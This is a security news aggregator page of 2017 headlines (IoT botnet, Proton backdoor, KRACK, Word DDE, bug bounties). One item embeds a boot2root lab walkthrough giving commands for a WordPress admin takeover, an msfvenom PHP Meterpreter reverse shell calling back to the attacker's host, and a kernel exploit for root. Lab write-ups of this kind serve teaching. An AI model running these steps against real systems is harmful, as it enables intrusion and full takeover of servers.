Feed aggregator

New Rapidly-Growing IoT Botnet Threatens to Take Down the Internet

News from 'The Hackers News' - 15 hours 19 min ago
Just a year after Mirai—biggest IoT-based malware that caused vast Internet outages by launching massive DDoS attacks—completed its first anniversary, security researchers are now warning of a brand new rapidly growing IoT botnet. Dubbed 'IoT_reaper,' first spotted in September by researchers at firm Qihoo 360, the new malware no longer depends on cracking weak passwords; instead, it exploits
Categories: Cyber India

MacOS Proton backdoor delivered via Trojanized media player app

News from 'Help Net Security' - Sat, 21/Oct/2017 - 01:26
A Trojanized version of Elmedia Player software for Mac was available for download for who knows how long from the developer’s official site, ESET researchers have found. The threat The compromised package was made to deliver the newest version of the Proton backdoor. After gaining persistence on a victim’s system, the malware is able to hoover up OS and browser information (history, cookies, bookmarks, login data, etc.); SSH, GnuPG, 1Password, and macOS keychain data; VPN … More →
Categories: Cyber India

EU MEPs want stronger privacy rules for Internet-enabled communication services

News from 'Help Net Security' - Fri, 20/Oct/2017 - 23:10
With 31 votes for, 24 against and one abstention, the European Parliament Committee on Civil Liberties, Justice and Home Affairs (LIBE) has backed new privacy protections for EU citizens. The approved draft proposals would apply to SMS and telephone services, as well as Internet-enabled services and electronic communication tools such as WhatsApp, Skype, Messenger and Facebook. The Committee also wants “cookie walls” to be banned, and the prohibition of snooping on personal devices via cookies … More →
Categories: Cyber India

New infosec products of the week​: October 20, 2017

News from 'Help Net Security' - Fri, 20/Oct/2017 - 20:00
Ransomware protection intercepts threats targeting enterprise data FileCloud announced FileCloud Breach Intercept, which offers ransomware protection. FileCloud offers branding and customization tools, allowing you to set your own policies, and design your own emails and alerts. Customized emails and UX reduce spoofing risk as hackers can’t run a mass spoofing unless they have an exact copy of an email from one of your employees. Nfusion 2 provides stronger misattribution environments for online investigation Ntrepid announced … More →
Categories: Cyber India

The complex digital life of the modern family: Online safety and privacy concerns

News from 'Help Net Security' - Fri, 20/Oct/2017 - 19:30
The National Cyber Security Alliance (NCSA) conducted a study to better understand teens and parents’ attitudes, concerns and knowledge base about online safety and privacy and how they view their own responsibility to keep themselves safe while on the Internet. The issue of fake news Almost 50 percent of teens said they were “very” or “somewhat” concerned about mistakenly spreading fake news or misinformation over the Internet. Over 60 percent of Parents indicated they were … More →
Categories: Cyber India

Can it be true? Most consumers value security more than convenience

News from 'Help Net Security' - Fri, 20/Oct/2017 - 19:00
52 percent of UK consumers think fraud is an inevitable part of shopping online, according to Paysafe, a global payments provider. What are the top three challenges of identifying, managing and protecting against fraud across different payment methods? Security or convenience? In a wake-up call for online business, this research contradicts the widely-held belief that consumers value convenience and experience over security when shopping online. Instead, 60 percent of consumers are willing to accept any … More →
Categories: Cyber India

Ubuntu 17.10 brings enhanced security and productivity for developers

News from 'Help Net Security' - Fri, 20/Oct/2017 - 18:30
Canonical released Ubuntu 17.10 featuring a new GNOME desktop on Wayland, and new versions of KDE, MATE and Budgie. On the cloud, 17.10 brings Kubernetes 1.8 for hyper-elastic container operations, and minimal base images for containers. Enhanced security and productivity for developers The Atom editor and Microsoft Visual Studio Code are emerging as the new wave of popular development tools, and both are available across all supported releases of Ubuntu including 16.04 LTS and 17.10. … More →
Categories: Cyber India

Unpatched Microsoft Word DDE Exploit Being Used In Widespread Malware Attacks

News from 'The Hackers News' - Fri, 20/Oct/2017 - 15:37
A newly discovered unpatched attacking method that exploits a built-in feature of Microsoft Office is currently being used in various widespread malware attack campaigns. Last week we reported how hackers could leveraging an old Microsoft Office feature called Dynamic Data Exchange (DDE), to perform malicious code execution on the targeted device without requiring Macros enabled or memory
Categories: Cyber India

Google wants bug hunters to probe popular Android apps for bugs

News from 'Help Net Security' - Fri, 20/Oct/2017 - 06:35
Google has started another bug bounty initiative: the Google Play Security Reward Program. While the name of the program might suggest that bug hunters will be after vulnerabilities in Google’s official Android app market, in reality they will be asked to unearth bugs in all of Google’s apps available on Google Play, as well as a short list of other popular ones. Currently in scope are the Alibaba, Dropbox, Duolingo, Headspace, Line, Snapchat, Mail.Ru, and … More →
Categories: Cyber India

Samsung to Give Linux Desktop Experience to Smartphone Users

News from 'TechNewsWorld' - Fri, 20/Oct/2017 - 04:58
Samsung on Thursday announced a new app, Linux on Galaxy, designed to work with its DeX docking station to bring a full Linux desktop experience to Galaxy Note8, Galaxy S8 and S8+ smartphone users. Samsung earlier this year introduced DeX, a docking station that connects to a monitor to give Galaxy smartphone users a desktop experience. With the Linux on Galaxy app, users will be able to run full Linux desktop distributions. The ability to run a Linux environment is "interesting at best," said Jitesh Ubrani, senior research analyst at IDC.
Categories: Cyber India

Cisco plugs WPA2 holes, critical Cloud Services Platform flaw

News from 'Help Net Security' - Fri, 20/Oct/2017 - 01:15
Cisco has released updates to address vulnerabilities in a wide variety of its products. Among these are updates fixing the WPA2 vulnerabilities that can be exploited in the newly unveiled KRACK attacks, as well as a critical vulnerability affecting the company’s Cloud Services Platform. The WPA2 flaws Cisco is still working on finishing the list of its products that are affected by one or more of the ten vulnerabilities affecting WPA and WPA2 discovered by … More →
Categories: Cyber India

Google Play Store Launches Bug Bounty Program to Protect Popular Android Apps

News from 'The Hackers News' - Thu, 19/Oct/2017 - 23:59
Better late than never. Google has finally launched a bug bounty program for Android apps on Google Play Store, inviting security researchers to find and report vulnerabilities in some of the most popular Android apps. Dubbed "Google Play Security Reward," the bug bounty program offers security researchers to work directly with Android app developers to find and fix vulnerabilities in their
Categories: Cyber India

Business suffers as over-zealous security tools block legitimate work

News from 'Help Net Security' - Thu, 19/Oct/2017 - 23:30
Most security teams utilise a ‘prohibition approach’ – i.e. restricting user access to websites and applications – a tactic which is hampering productivity and innovation while creating major frustration for users, according to research conducted by Vanson Bourne. “At a time when competition is fierce, the risk of falling behind and being less productive is as big a risk to an enterprise as cyberattacks. Security has to enable innovation by design, not act as a … More →
Categories: Cyber India

Apple, GE Join Forces on Industrial IoT Apps

News from 'TechNewsWorld' - Thu, 19/Oct/2017 - 22:27
Apple and General Electric on Wednesday announced a new SDK for iOS that enables developers to create applications for Predix, an Internet of Things platform made by GE. Applications developed with the new SDK could give industrial operators more insight and visibility into the performance of their equipment and operations on an iPhone or iPad. For example, a worker who was notified of a problem by phone would be able to check it out immediately and even collaborate with others on the scene to address the problem.
Categories: Cyber India

KRACK Demo: Critical Key Reinstallation Attack Against Widely-Used WPA2 Wi-Fi Protocol

News from 'The Hackers News' - Thu, 19/Oct/2017 - 22:13
Do you think your wireless network is secure because you're using WPA2 encryption? If yes, think again! Security researchers have discovered several key management vulnerabilities in the core of Wi-Fi Protected Access II (WPA2) protocol that could allow an attacker to hack into your Wi-Fi network and eavesdrop on the Internet communications. WPA2 is a 13-year-old WiFi authentication scheme
Categories: Cyber India

Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

News from 'Hacking Articles' - Thu, 19/Oct/2017 - 21:23

BTRSys is boot2root challenge developed by ‘ismailonderkaya’ in the series of BRTSys. This is an amazing lab for practice which has covered every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target. And for that use the following command.

netdiscover

We know our target is 192.168.0.106 so, therefore, apply nmap on it as it will help us know which ports and services are open. Use the following command:

nmap -A 192.168.0.106

Due to nmap you can see that port 21, 22 and 80 are open with the service of FTP, SSH and HTTP respectively. As we still have a lot to find about this, we decided to use DIRB. Dirb is web-scanner i.e. it will scan the whole web application for file/directories. It will even show the hidden files. Use the following command:

dirb http://192.168.0.106

As you can see in the above image that using dirb we found various files and directories such as robots.txt, upload, etc. but you can also see that our target web application is using wordpress, so, we can easily apply a wordpress scan using the following command which covers themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ –enumerate at –enumerate ap –enumerate u

As a result we have found two users – btrisk and admin.

Now if you try to login through admin using password admin you have the access of the dashboard. And once you have that access you can execute a malicious PHP code there in to have a meterpreter session. Use the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you a php code which you have to execute. Copy the code from <?php to die(); and paste it in the template as shown below :

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before executing the above URL, make sure that your meterpreter handler is active. And to do so; go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 444

exploit

Once the handler is active and url is executed, you will have your session. Let’s check the system’s information which we have entered and for this type:

sysinfo

Now let’s get into shell by simply typing:

shell

Through shell we came to know that Ubuntu’s version is 16.04.2 and fortunately there is exploit in exploit-db for this version of ubuntu. Download this exploit.

This exploit will help you to have achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it and for that type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it in the /tmp directory. For that you will need to go to /tmp directory. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now got o shell>/tmp and give the permission to the exploit rootshell and the execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are in the root. And so our Boot2Root challenge is complete.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

 

The post Hack the BTRSys: v2.1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Millions download botnet-building malware from Google Play

News from 'Help Net Security' - Thu, 19/Oct/2017 - 20:47
Researchers have discovered a new batch of malicious apps on Google Play, some of which have been downloaded and installed on some 2.6 million devices. The apps’ capabilities The apps posed as legitimate offerings that modify the look of the characters in Minecraft: Pocket Edition (PE). In the background, though, they set out to rope the devices into a botnet. Once they were installed on a target device, they would connect to a C&C server, … More →
Categories: Cyber India

Another KRACK in the network perimeter

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:30
When a high profile vulnerability surfaces that is as far reaching as KRACK, a WPA2 encryption attack to hijack Wi-Fi networks, it’s common to respond impulsively. “Why are people using outdated technologies?” or “Why aren’t people patching their software?” While easy to blame the protocols and the people involved, it gets us nowhere. Every breach gets the same treatment. If we’re ever going to get out of this infinite loop, we need a fundamentally different … More →
Categories: Cyber India

Most organizations don’t have SSH security policies in place

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:15
Cybercriminals can abuse SSH keys to secure and automate administrator-to-machine and machine-to-machine access to critical business functions. According to Venafi’s research, even though SSH keys provide the highest levels of administrative access they are routinely untracked, unmanaged and poorly secured. For example, 63 percent of respondents admit they do not actively rotate keys, even when an administrator leaves their organization, allowing them to have ongoing privileged access to critical systems. “A compromised SSH key in … More →
Categories: Cyber India

Enterprise container security: There’s room for improvement

News from 'Help Net Security' - Thu, 19/Oct/2017 - 19:00
With companies such as Facebook, Netflix and Google heralding the use of containers for their agility, portability, and cost benefits – enterprises are following suit. But the introduction of new processes and changes to infrastructure require a significant shift in focus. To learn the current state of container security in the enterprise, Aqua Security surveyed 512 individuals meeting the criteria of using containers in development or production today, or planning to use them in the … More →
Categories: Cyber India
Syndicate content